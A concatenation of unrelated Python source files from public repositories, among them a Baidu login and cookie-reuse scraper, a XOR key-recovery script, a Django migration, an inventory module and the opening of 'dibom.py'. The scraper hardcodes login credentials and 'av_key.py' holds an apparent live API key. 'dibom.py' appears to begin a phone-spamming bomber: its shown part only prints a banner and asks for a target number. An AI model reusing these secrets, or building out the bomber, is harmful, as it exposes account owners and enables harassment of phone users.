09ee188e0e0198bf781e7d62c16c41f203004684 | 0b1b3c2fbbbfdfe8a2c807eac16c0987bb72d088 | /show_lable.py | 0a21a5f66116c5e346df5b4c68c8bba65db2736b | [] | no_license | luceefer/jarvis | 0c66e875920c12b6bdb806a25e41d6430126b27b | f9bce1e1fa69eeb5aab093ff4f1af4b3640820c7 | refs/heads/master | 2020-09-02T09:10:54.984994 | 2020-03-27T07:57:24 | 2020-03-27T07:57:24 | 219,187,100 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | from tkinter import *
from tkinter import messagebox
def show():
    text = inp.get().strip()
    if len(text) == 0:
        messagebox.showerror("invalid data", "you haven't entered a string")
    else:
        var.set(text)
        inp.delete(0, END)
root=Tk()
root.title("change Lable")
root.geometry("250x200")
var=StringVar()
var.set("My label")
lab=Label(root,text="My Lable",textvariable=var)
lab.pack()
inp=Entry(root,bd=5)
inp.pack()
but=Button(root,text="Show",command=show)
but.pack()
inp.focus()
root.mainloop()
| [
"[email protected]"
] | |
8509bcc7b74ba994bd01e48425a401c28d9f421d | a38da65c23ae9b68f5c2815c2bd9d98dd6ba2e61 | /spider_note/demo-10-登陆百度获取cookies,requests.py | a2774bb00411eadd680996d3fcd382a8465e86e7 | [] | no_license | moxue1314/spider_note | 64921113e44c6a4a5ddad5b564f35434f4888c54 | a12a7bfa1d5cea497df67fbdd58ff8dc705ab5b8 | refs/heads/master | 2020-03-20T01:50:16.847556 | 2018-06-12T15:36:51 | 2018-06-12T15:36:51 | 137,090,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,489 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import random
import time
from lxml import etree
import requests
from requests.cookies import RequestsCookieJar
__author__ = 'Jiexun Li'
from selenium import webdriver
# Homework:
# 1. Log into Baidu with selenium, grab the cookies and save them
# 2. Load the cookies with requests and open the Baidu page logged in
# 3. Visit Baidu Index and query a keyword
# ------------------------------ log into Baidu and save cookies ------------------------------------------------------
# Firefox
# driver = webdriver.Firefox()
#
# # set the window size
# driver.set_window_size(1366, 768)
# # page load timeout
# driver.set_page_load_timeout(10)
# # script execution timeout
# driver.set_script_timeout(10)
#
# driver.get('https://www.baidu.com/')
#
# time.sleep(2)
#
# ele_login_ui = driver.find_element_by_xpath('//div[@id="u1"]/a[@name="tj_login"]')
# # driver.execute_script("window.scrollTo(0, 0);") # 将滚动条移动到指定的位置
# ele_login_ui.click()
#
# # driver.get('https://passport.baidu.com/v2/?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F&sms=5')
# time.sleep(2)
# ele_login_button = driver.find_element_by_id('TANGRAM__PSP_10__footerULoginBtn')
# ele_login_button.click()
# time.sleep(2)
#
# ele_username = driver.find_element_by_id('TANGRAM__PSP_10__userName')
# ele_username.clear()
# # username
# ele_username.send_keys('mumuloveshine')
# ele_pwd = driver.find_element_by_id('TANGRAM__PSP_10__password')
# ele_pwd.clear()
# # password
# ele_pwd.send_keys('mumu2018')
#
#
# # **** enter the captcha before logging in **** (a breakpoint is needed here)
#
#
# ele_login = driver.find_element_by_id('TANGRAM__PSP_10__submit')
# ele_login.click()
#
#
# cookies = driver.get_cookies()
#
# # visit every domain whose cookies are needed, then merge and save the cookies of all domains
# driver.get('http://passport.baidu.com')
# cookies.extend(driver.get_cookies())
#
# file = 'baidu_cookies_update.txt'
# with open(file, 'w') as f:
# json.dump(cookies, f)
# driver.quit()
# ---------------------------- visit Baidu Index with selenium -------------------------------------------------------
# driver.get('http://index.baidu.com/')
# print('aaa')
# time.sleep(2)
# search_box = driver.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div[1]/div/div[2]/form/input[3]')
# search_box.clear()
# search_box.send_keys('汽车排行')
# confirm_button = driver.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div[1]/div/div[2]/div/span/span')
# confirm_button.click()
# driver.quit()
# # ------------------------------ load cookies with requests and open Baidu logged in --------------------------------------------
def load_cookie(s, file):
with open(file, 'r') as f:
cookies = json.load(f)
jar = RequestsCookieJar()
for cookie in cookies:
jar.set(cookie['name'], cookie['value'])
s.cookies = jar
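# Cookie file shape assumed by load_cookie (this is what selenium's get_cookies
# saved above): [{"name": "...", "value": "...", "domain": "...", ...}, ...];
# only the name/value pairs are used here.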
USER_AGENT_LIST =[
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
]
def make_session():
s = requests.session()
s.trust_env = False
s.verify = False
s.headers = {
'User-Agent': random.choice(USER_AGENT_LIST),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
return s
if __name__ == '__main__':
s = requests.session()
s.trust_env = False
s.verify = False
s.headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
url = 'https://www.baidu.com/'
# r = s.get(url)
#
# if '推荐' in r.text:
    # print('login successful')
    # else:
    # print('not logged in')
file = 'baidu_cookies_update.txt'
load_cookie(s, file)
r = s.get(url)
    if '推荐' in r.text:  # '推荐' ("recommended") only appears for a logged-in user
        print('login successful')
    else:
        print('not logged in')
    # ---------------------------- visit Baidu Index with requests ---------------------------------------------------
url = 'http://index.baidu.com/'
params = {
'tpl':'trend',
            'word':'汽车排行',  # search keyword ("car rankings")
}
s.headers['referer'] = 'http://index.baidu.com/'
r = s.get(url, params=params)
r.encoding='GBK'
    if '购买记录' in r.text:  # '购买记录' ("purchase history") marks a successfully loaded page
        print('request succeeded')
        print(r.text)
| [
"[email protected]"
] | |
7a7d82fe392ff8a2344e80d9756c966444e238c8 | 6223dc2e5de7921696cb34fb62142fd4a4efe361 | /.metadata/.plugins/org.eclipse.core.resources/.history/ba/4082c82b28630014154bc3193a2d6330 | c36583ab687e3e88509d031ecdd54a0ed18471a8 | [] | no_license | Mushirahmed/python_workspace | 5ef477b2688e8c25b1372f546752501ee53d93e5 | 46e2ed783b17450aba29e4e2df7b656522b2b03b | refs/heads/master | 2021-03-12T19:24:50.598982 | 2015-05-25T10:23:54 | 2015-05-25T10:23:54 | 24,671,376 | 0 | 1 | null | 2015-02-06T09:27:40 | 2014-10-01T08:40:33 | Python | UTF-8 | Python | false | false | 3,833 | #!/usr/bin/env python
#
# Copyright 2014 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import numpy
import copy
#from gnuradio import gr
import gras
class expo(gras.Block):
"""
docstring for block expo
"""
def __init__(self):
gras.Block.__init__(self,
name="expo",
in_sig=[numpy.float32],
out_sig=[numpy.float32])
def set_parameters(self,g,a,b):
self.gama=g
self.alpha=a
self.beta=b
def yield_times(self):
from datetime import date, time, datetime, timedelta
start = datetime.combine(date.today(), time(0, 0))
yield start.strftime("%S")
while True:
start += timedelta(seconds=1)
yield start.strftime("%S")
def work(self, input_items, output_items):
in0 = input_items[0]
out = output_items[0]
tmrg = []
o1 = []
o2 = []
o3 = []
o4 = []
ans = []
gen = self.yield_times()
for ii in range(10):
tmrg.append(gen.next())
print "tmrg :",tmrg
for i1 in range(0,len(tmrg)):
o1.append((self.gama)/(self.alpha*self.beta))
print "o1 : ", o1
for i2 in range(0,len(tmrg)):
o2.append(((self.gama)*(-numpy.exp(self.alpha*i2)))/(self.alpha*(self.beta-self.alpha)))
print "o2 : ",o2
        for i3 in range(0,len(tmrg)):
            o3.append(((self.gama)*(-numpy.exp(self.beta*i3)))/(self.beta*(self.alpha-self.beta)))  # was i2: a stale loop variable left over from the previous loop
print "o3 : ",o3
        ans.append([a + b + c for a, b, c in zip(o1, o2, o3)])  # element-wise sum of the three terms; a bare o1+o2+o3 would just concatenate the lists
print "Final Ans : ",ans
print "Type out : ",type(out)
print "Type ans :",type(ans)
#out = copy.copy(ans)
out[0:1] = ans
print "Output is : " ,out
self.consume(0,1)
self.produce(0,1)
#o2 = -numpy.exp(-2*in0[0:1])
#o3 = -numpy.exp(-3*in0[0:1])
#o2=numpy.exp(-(in0[0:1]*self.alpha))
#print("o2 :",o2)
#o3=numpy.sin((self.freq*in0[0:1])+(self.sigma))
#print("o3 :",o3)
#o4=numpy.sqrt(o1-numpy.square(self.zita))
#print("o4 :",o4)
"""ans = o1-(mul/o4)
#ans.append(o1-((numpy.exp(-in0[0:1]*self.sigma)*(numpy.sin((self.freq*in0[0:1])+(self.sigma))))/numpy.sqrt(o1-numpy.square(self.zita))))
print("Final Value : ",ans)
out[0:1] = ans"""
#o2 = -numpy.exp(-2*tmrg)
#o3 = -numpy.exp(-3*in0[0:1])
#o2 = numpy.exp(-in0[0:1]*self.alpha)
#o3 = numpy.exp(-in0[0:1]*self.beta)
#o4 = numpy.sqrt(1-numpy.square(self.alpha))
#ans = 1-((o2*o3)/o4)
#ans.append(o2)
#ans.append(o1-((numpy.exp(-in0[0:1]*self.sigma)*(numpy.sin((self.freq*in0[0:1])+(self.sigma))))/numpy.sqrt(o1-numpy.square(self.zita))))
#print("Final Value : ",ans)
#out[0:1] = ans
#out = copy.copy(ans)
#self.consume(0,1)
#self.produce(0,1)
#return len(output_items[0])
| [
"[email protected]"
] | ||
5d3ed03203cfe58547c75b642234201ba1430944 | 20dbb407a606997685bf107044cb21f8cf020701 | /todo/migrations/0001_initial.py | 7431c728e1a74144822ef08b194ffd6bd6640703 | [
"MIT"
] | permissive | pyrush/django_deploy | dfb1378823ce064ac236739b2f59230ae7a90968 | a1e09909f46e1fb728c68d87e31d6fb3d75e6fde | refs/heads/main | 2023-07-30T17:59:41.948714 | 2021-10-03T15:11:08 | 2021-10-03T15:11:08 | 413,048,844 | 0 | 0 | MIT | 2021-10-03T11:06:36 | 2021-10-03T10:45:51 | null | UTF-8 | Python | false | false | 493 | py | # Generated by Django 3.2.6 on 2021-08-29 08:43
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='TODOModel',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=101)),
],
),
]
| [
"[email protected]"
] | |
304013664f2c33bb46dc50c1e2c543662bc47a42 | 96ea5e2025194823b61e248786cf7b1124cfd40a | /.history/store/store_20180419135458.py | 18098abfadb30b57b4b620843fe2fcc91e1061f8 | [] | no_license | JanBartoszek/ERP | c500c040c4e8d5390ed052d28d68e91af338e71b | b557b6800dd7a3dacf8d78cb729031503149d9d1 | refs/heads/master | 2020-03-11T08:53:20.264464 | 2018-04-19T16:21:08 | 2018-04-19T16:21:08 | 129,895,254 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,413 | py | # data structure:
# id: string
# Unique and random generated (at least 2 special char()expect: ';'), 2 number, 2 lower and 2 upper case letter)
# title: string
# manufacturer: string
# price: number (dollars)
# in_stock: number
# importing everything you need
import os
# User interface module
import ui
# data manager module
import data_manager
# common module
import common
def start_module():
"""
Starts this module and displays its menu.
User can access default special features from here.
User can go back to main menu from here.
Returns:
None
"""
while True:
list_options = ["show_table",
"add",
"remove",
"update",
"get_counts_by_manufacturers",
"get_average_by_manufacturer"]
ui.print_menu("\nStore:\n", list_options, "Back to main")
try:
inputs = ui.get_inputs(["Please enter a number: "], "")
option = inputs[0]
table = data_manager.get_table_from_file('store/games.csv')
if option == "1":
show_table(table)
elif option == "2":
add(table)
elif option == "3":
id_ = ui.get_inputs(["id_"], "Enter record id")[0]
remove(table, id_)
elif option == "4":
id_ = ui.get_inputs(["id_"], "Enter record id")[0]
update(table, id_)
elif option == "5":
result = get_counts_by_manufacturers(table)
label = '\nManufacturers with number of their different titles in shop:\n'
ui.print_result(result, label)
elif option == "6":
manufacturer = ui.get_inputs(["\nPlease enter manufacturer:\n"], "")[0]
result = get_average_by_manufacturer(table, manufacturer)
label = "Average number of games by {} in shop:".format(manufacturer)
ui.print_result(result, label)
elif option == "0":
break
else:
raise KeyError("There is no such option.")
except KeyError as err:
ui.print_error_message(err)
def show_table(table):
"""
Display a table
Args:
table: list of lists to be displayed.
Returns:
None
"""
title_list = ['id_', 'Title', 'manufacturer', 'price', 'in_stock']
ui.print_table(table, title_list)
def add(table):
"""
Asks user for input and adds it into the table.
Args:
table: table to add new record to
Returns:
Table with a new record
"""
labels = ['Title', 'manufacturer', 'price', 'in_stock']
user_inp = common.check_user_inp(labels, 2, 3)
# user_input = ui.get_inputs(['Title', 'manufacturer', 'price', 'in_stock'],"Please provide information")
# while common.is_number(user_input[2]) is False or common.is_number(user_input[3]) is False:
# ui.print_error_message('Error: Price and Stock value must be numbers')
# user_input = ui.get_inputs(['Title', 'manufacturer', 'price', 'in_stock'],"Please provide information")
# continue
new_id = common.generate_random(table)
new_record = [new_id] + user_inp
table += [new_record]
data_manager.write_table_to_file('store/games.csv', table)
return table
def remove(table, id_):
"""
Remove a record with a given id from the table.
Args:
table: table to remove a record from
id_ (str): id of a record to be removed
Returns:
Table without specified record.
"""
for item1 in table:
for item2 in item1:
if item2 == id_:
table.remove(item1)
data_manager.write_table_to_file('store/games.csv', table)
return table
def update(table, id_):
"""
Updates specified record in the table. Ask users for new data.
Args:
table: list in which record should be updated
id_ (str): id of a record to update
Returns:
table with updated record
"""
user_input = ui.get_inputs(['Title', 'manufacturer', 'price', 'in_stock'], "Please provide information")
for item1 in table:
for item2 in item1:
if item2 == id_:
item1[1], item1[2], item1[3], item1[4] = user_input[0], user_input[1], user_input[2], user_input[3]
data_manager.write_table_to_file('store/games.csv', table)
return table
# special functions:
# ------------------
# the question: How many different kinds of game are available of each manufacturer?
# return type: a dictionary with this structure: { [manufacturer] : [count] }
def get_counts_by_manufacturers(table):
manufacturers_dict = {}
for item in table:
if item[2] not in manufacturers_dict:
manufacturers_dict[item[2]] = 1
else:
manufacturers_dict[item[2]] += 1
return manufacturers_dict
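# e.g. rows whose manufacturer column reads 'Nintendo', 'Nintendo', 'Sega'
# -> {'Nintendo': 2, 'Sega': 1}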
# the question: What is the average amount of games in stock of a given manufacturer?
# return type: number
def get_average_by_manufacturer(table, manufacturer):
counter1 = 0
counter2 = 0
for item1 in table:
for item2 in item1:
if item2 == manufacturer:
counter1 += 1
counter2 += int(item1[4])
result = counter2 / counter1
return result
| [
"[email protected]"
] | |
c693e6e5b7b2bb5921e37941401c55cea7d8de59 | 7b14766d7433b3b1099a0df959cab354f75a893b | /DecryptNaN.py | 5519a55e81c71a2545989f2bc10c5ad06e6fd3db | [] | no_license | davidxk/DecryptNaN | 949b839d4bb521a84d77fbfdfcc3e556bb66dc85 | c1dabe06d2ea1a90d87b645e33d38a6b7c088d2c | refs/heads/master | 2021-05-04T11:30:10.855498 | 2017-12-29T11:11:56 | 2017-12-29T11:11:56 | 46,795,873 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,208 | py | #!/usr/bin/python3
import fileinput
def given_verify(ciphr_0, plain_0, ciphr_3, plain_3):
presumed_key = ciphr_0 ^ plain_0
return ciphr_3 ^ plain_3 == presumed_key
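# Why this check works (sketch): with a repeating 3-byte XOR key,
# cipher[i] ^ plain[i] == key[i % 3], so positions i and i+3 must recover the
# same key byte -- e.g. for plain "Natural", 'N' (pos 0) and 'u' (pos 3) share key[0].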
def arrage_key(start, keys):
for i in range( start ):
keys.insert( 0, keys.pop() )
return keys
def decrypt(line):
ciphers = eval( line )
Natural = "Natural"
keys = []
key_len = 3
for i in range( len(ciphers) - key_len ):
for j in range( len(Natural) - key_len ):
if not given_verify( ciphers[i + j], ord( Natural[j] ),
ciphers[i + j + key_len], ord( Natural[j + key_len] ) ):
break
if j == len(Natural) - key_len - 1:
for k in range( key_len ):
keys.append( ciphers[i + k] ^ ord( Natural[ k ] ) )
keys = arrage_key( i, keys)
break
        if keys:
            # key fully recovered -- stop scanning. The original `elif (j != 0): i += j - 1`
            # was a syntax error after the inner for-loop, and reassigning a for-loop
            # variable would not skip iterations in Python anyway.
            break
    if len(keys) == 0:
        print("No 'Natural' word found! ")
        return  # without a key, the XOR loop below would crash on an empty list
#else: print(keys)
for i in range( len(ciphers) ):
plain = ciphers[ i ] ^ keys[ i % 3 ]
print( chr(plain), end = "")
print()
if __name__=="__main__":
for line in fileinput.input():
decrypt(line)
| [
"[email protected]"
] | |
0800911a8ad10d04e48b6389ed205ca42d6a95aa | a090dcc34ace575eed932c573ebbd9cb231acb2e | /av_key.py | d0ed8dc1f3a10013cc1e8b4c14acf02212845040 | [] | no_license | twrule/StocksAI | 23125d48724acba3f5df42b599d36b699eecbec7 | 1a0859c1484b1d3ef7505c9cb2c546923b6f0458 | refs/heads/master | 2021-05-25T23:05:30.386228 | 2020-04-08T01:54:19 | 2020-04-08T01:54:19 | 253,958,457 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27 | py | av_key = 'K0J326KZNCYJH0TS' | [
"[email protected]"
] | |
39428fb9dad862a9a21f5e180b5e449aa8fa84c1 | 759f7993d8b96336d6d19be68deab30e7bd55b55 | /python/func-opdir/delete_dir.py | a7b0dbe5a9b8c887a7fb50368f10172ee26a63f9 | [] | no_license | wyblhx/study | fc13672a8154981615e8c054d76807956d10355b | 42dba01a7a48539cc916908f5b9607ec82bc8781 | refs/heads/master | 2023-01-13T08:48:15.872526 | 2020-11-19T09:43:37 | 2020-11-19T09:43:37 | 304,700,082 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | import os
'''
Recursively delete every file and sub-directory under the target;
if the target itself is a file, delete it as well.
'''
def delete_dir(target):
    # is the target a directory?
    if os.path.isdir(target):
        for file in os.listdir(target):
            # os.listdir yields every file and folder inside the current folder
            path = os.path.join(target, file)
            if os.path.isdir(path):
                delete_dir(path)
            else:
                os.remove(path) # delete the file
        os.rmdir(target)  # the directory is empty now, so remove it too (the original had a second, unreachable `else` here)
    else:
        os.remove(target)
dir = os.path.join(os.getcwd(), 'test')
# print(dir)
if os.path.exists(dir):
delete_dir(dir)
else:
print('error')
| [
"[email protected]"
] | |
a021be8a6976430e0f3e878fdbe1bfd54884e888 | 52792ac61b66a4f94245ffb9622a8fcb511f8d63 | /importacao.py | b4bd6972a3a23d6b24e2a64c2253d384597eb867 | [] | no_license | lucassouza252/Financial-analysis | 07f71350ed53037ef7db90020490430da484dd80 | 3d60450738b8f3dd3635bb3f864121c6e4b4457d | refs/heads/main | 2023-06-09T07:20:07.998729 | 2021-06-29T22:53:13 | 2021-06-29T22:53:13 | 375,542,166 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 700 | py | # -*- coding: utf-8 -*-
"""
Importaçao e Organização de Dados
@author: lucas
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pandas_datareader import data as wb
ser = pd.Series(np.random.random(5), name="column 01")
ser
PG = wb.DataReader("PG", data_source="yahoo", start="1995-1-1")
PG.head()
PG.tail()
PG.info()
tickers = ["PG", "MSFT", "T", "F", "GE"]
new_data = pd.DataFrame()
for t in tickers:
new_data[t] = wb.DataReader(t, data_source="yahoo", start="1995-1-1")["Adj Close"]
new_data.head()
new_data.info()
oibr = wb.DataReader("OIBR3.SA", data_source="yahoo", start="2015-1-1")
oibr.head()
plt.plot(oibr["Close"])
plt.plot(oibr["Open"])
plt.show() | [
"[email protected]"
] | |
3541b1cb13351732ae0a10d6dd9c1ed913b043e0 | fa14e529a3615b3f21a9aa1f1de372a8f8709a24 | /batch_optonose_traces.py | a5ad0f15a126b849b622c5c479bcf3e4d07ba786 | [] | no_license | akurnikova/JNP2018 | d960923991dc635ced858cddeabb3d83163b1b82 | 67cb1ba0ecc821856b0df0d4e71793bf13808052 | refs/heads/master | 2021-06-02T13:16:27.938837 | 2020-12-15T20:32:07 | 2020-12-15T20:32:07 | 151,632,347 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,829 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 12 14:48:15 2018
@author: asya
"""
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
import os
import pandas as pd
import seaborn as sns
from import_data_for_plots import get_10ms_dataframes  # assumed: this local module provides the get_10ms_dataframes used below
from matplotlib import rcParams
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['Arial']
import matplotlib as mpl
mpl.rcParams['pdf.fonttype'] = 42
mouse_list = {'GluReaCh23',
'GluReaCh24',
'GluReaCh25',
'GluReaCh26',
'GluReaCh27',
'GluReaCh28',
'GluReaCh29',
'GluReaCh30',
'GluReaCh31',
'GluReaCh32',
'GluReaCh33',
'GluReaCh34',
'GluReaCh35',
'GluReaCh36',
'GluReaCh37',
'GluReaCh38',
'GluReaCh39',
'GluReaCh41',
'GluReaCh42',
}
cLesion = (1.,0.8,0.)
cLesionNIRT = (0.2,0.8,0.8)
cLess = (0.6,0.3,0.17)
cLeast = (0.1,0.1,0.1)
cControl = (0.7, 0.7, 0.7)
stack_to_color = {'GluReaCh23':cLeast, ###+-+-
'GluReaCh24':cLess, ###+-+-
'GluReaCh25':cLesion, ###++++
'GluReaCh26':cLeast, ###????
'GluReaCh27':cLesion, ###+-+-
'GluReaCh28':cControl, ###NO LESION
'GluReaCh29':cLess,
'GluReaCh30':cLeast,
'GluReaCh31':cLesion, ###++++
'GluReaCh32':cControl, ###NO LESION
'GluReaCh33':cLeast,
'GluReaCh34':cControl, ###NO LESION
'GluReaCh35':cLesion, ###++++
'GluReaCh36':cControl, ###NO LESION
'GluReaCh37':cLeast,
'GluReaCh38':cLesion, ###++++
'GluReaCh39':cControl, ###NO LESION
'GluReaCh41':cLeast,
'GluReaCh42':cLesion, ###+-+-
}
'''
mouse_list = {'GluReaCh24',
'GluReaCh25', #RF
'GluReaCh27', #RF/Rostral IRT
'GluReaCh29', #RF
'GluReaCh31', #IRT
'GluReaCh35', #RF
'GluReaCh38', #IRT
'GluReaCh42', #IRT
}
stack_to_color = {'GluReaCh23':(0.5,0.,1.), ###+-+-
'GluReaCh24':(0.,0.5,1.), ###+-+-
'GluReaCh25':'r',#(1.,0.8,0.), ###+++
'GluReaCh27':'k',#(1.,0.8,0.), ###+-+-
'GluReaCh29':'y',#(1.,0.8,0.),
'GluReaCh31':'b',#(1.,0.3,0.), ###++++
'GluReaCh35':'m',#(1.,0.8,0.), ###++++
'GluReaCh38':'c',#(1.,0.3,0.), ###++++
'GluReaCh42':'g',#(1.,0.3,0.), ###+-+-
}
'''
fig, ax_new = plt.subplots(3,1, sharex=True)
#fig, ax_new = plt.subplots(2,1, sharex=False)
for ms_name in mouse_list:
dfX = get_10ms_dataframes(mouse_name = ms_name)
if len(dfX) == 0: continue
dfX = dfX.reset_index(drop=True)
dfXfilt = dfX.loc[dfX['varLpre']<0.1]
dfXfilt = dfXfilt.reset_index(drop=True)
dfXfilt = dfXfilt.dropna()
i_const =np.abs(dfXfilt['br_rate_at_stim']-dfXfilt['br_rate_at_100ms'])<=0.5
dfXfilt = dfXfilt[i_const]
A = np.vstack(dfXfilt['clipX'].as_matrix())
V = np.vstack(dfXfilt['clipV'].as_matrix())
Br = np.vstack(dfXfilt['clip_br_rate'].as_matrix())
if ms_name == 'GluReaCh26': continue
MN = np.mean(A[:,250:850],0)-np.mean(A[:,450:500])
STDERR = (np.std(A[:,250:850],0))/np.sqrt(A.shape[0])
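    # standard error of the mean across trials: SEM = std / sqrt(n_trials)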
ax_new[0].plot(np.arange(-250,350),MN, color = stack_to_color[ms_name])
# ax_new[0].fill_between(np.arange(-250,350),MN+STDERR,MN-STDERR, color = stack_to_color[ms_name],alpha = 0.3)
MN_V = np.mean(V[:,250:850],0)-np.mean(V[:,450:500])
STDERR_V = (np.std(V[:,250:850],0))/np.sqrt(V.shape[0])
ax_new[1].plot(np.arange(-250,350),MN_V, color = stack_to_color[ms_name])
# ax_new[1].fill_between(np.arange(-250,350),MN_V+STDERR_V,MN_V-STDERR_V, color = stack_to_color[ms_name],alpha = 0.3)
if ms_name in ['GluReaCh41','GluReaCh32','GluReaCh34']: continue
MN_Br = np.mean(Br[:,250:850],0)
STDERR_Br = (np.std(Br[:,250:850],0))/np.sqrt(Br.shape[0])
ax_new[2].plot(np.arange(-250,350),MN_Br, color = stack_to_color[ms_name])
ax_new[2].fill_between(np.arange(-250,350),MN_Br+STDERR_Br,MN_Br-STDERR_Br, color = stack_to_color[ms_name],alpha = 0.3)
# ax_new[2].scatter(np.mean(Br[:,450:490],0)-np.mean(Br[:,530:570],0),np.mean(A[:,530:570],0)-np.mean(A[:,450:500]),color = stack_to_color[ms_name])
fig_title = '/home/asya/Documents/data/mouse_nose/traces_10ms_stim.pdf'
plt.savefig(fig_title, format='pdf',dpi=fig.dpi)
| [
"[email protected]"
] | |
d6c2f45c35ed1af835382baa6d6f7442fd1656f7 | cd707557631322e60f55fc8c4d4511a7de6ae3ba | /transport_problem.py | a39888a38ad52c16d7042414c046cfda571ad728 | [
"Unlicense"
] | permissive | fjanoos/python | 7ddd1b08110041651e8aa964b72ba87847fa5de3 | d75d6159cbf3c91b1ca3507ee4bc45afc1ab85dc | refs/heads/master | 2020-03-13T03:37:28.194922 | 2018-04-25T03:49:08 | 2018-04-25T03:49:08 | 130,947,508 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 539 | py | #!/usr/bin/python
import argparse
import sys
if __name__ == "__main__":
''' build and solve the transportation problem '''
option_parser = argparse.ArgumentParser(description='Transportation problem')
option_parser.add_argument("-v", "--verbose", action="store_true", dest="verbose", default=True)
    option_parser.add_argument("args", nargs="*")  # positional arguments; argparse returns one namespace, not the (options, args) tuple of optparse
    options = option_parser.parse_args()
    if len(options.args) != 2:
        option_parser.print_help()
        sys.exit()
    startEnumeration(xrange(int(options.args[0])), int(options.args[1]))  # startEnumeration is expected to be provided elsewhere in the project
| [
"[email protected]"
] | |
8af3d0540048f1c5a220756d34986e6df7b3a3d4 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02389/s554583183.py | 44708d73345f1282b250c2bf77474c51419a5e07 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | def rect(a,b):
return a*b, 2*(a+b)
n =input()
x =n.split()
a =int(x[0])
b =int(x[1])
area, perimeter =rect(a,b)
print(area, perimeter)
| [
"[email protected]"
] | |
ee2ae116b190a0242e22da1e7baa15c551b36853 | 270eccc74c24e374186073d84eea9f5d2592f7bc | /dibom.py | b84348dfc1c5a646b528edd16ed3620cd48b7c47 | [] | no_license | Dima-dimaa/dibom | 359117af20c1202afadbd3e4e3c8bb65af8c2b99 | 6902cb63fc7cd03b50cb21e22cce7aeb5404e4d0 | refs/heads/main | 2023-03-26T06:23:32.755965 | 2021-03-10T20:51:51 | 2021-03-10T20:51:51 | 334,630,341 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,448 | py | import requests, time, os, fake_useragent, random
from termcolor import colored
user = fake_useragent.UserAgent().random
headers = {'user_agent': user}
t=0
f=0
gg = 0
if t == 0:
os.system("clear")
banner ="""
_ _ _
| (_) |
__| |_| |__ ___ _ __ ___
/ _` | | '_ \ / _ \| '_ ` _ \
| (_| | | |_) | (_) | | | | | |
\__,_|_|_.__/ \___/|_| |_| |_|
Создатель: Дмитрий Янков"""
x = random.randint(1, 3)
if x == 1:
print(colored(banner, 'magenta'))
if x == 2:
print(colored(banner, 'yellow'))
if x == 3:
print(colored(banner, 'green'))
print('')
phone = input(colored('Введите номер: (Без +) —>', 'magenta'))
if len(phone) == 11:
t = 1
else:
print(colored('Номер введён неверно !!!', 'red'))
os.system("python3 dibom.py")
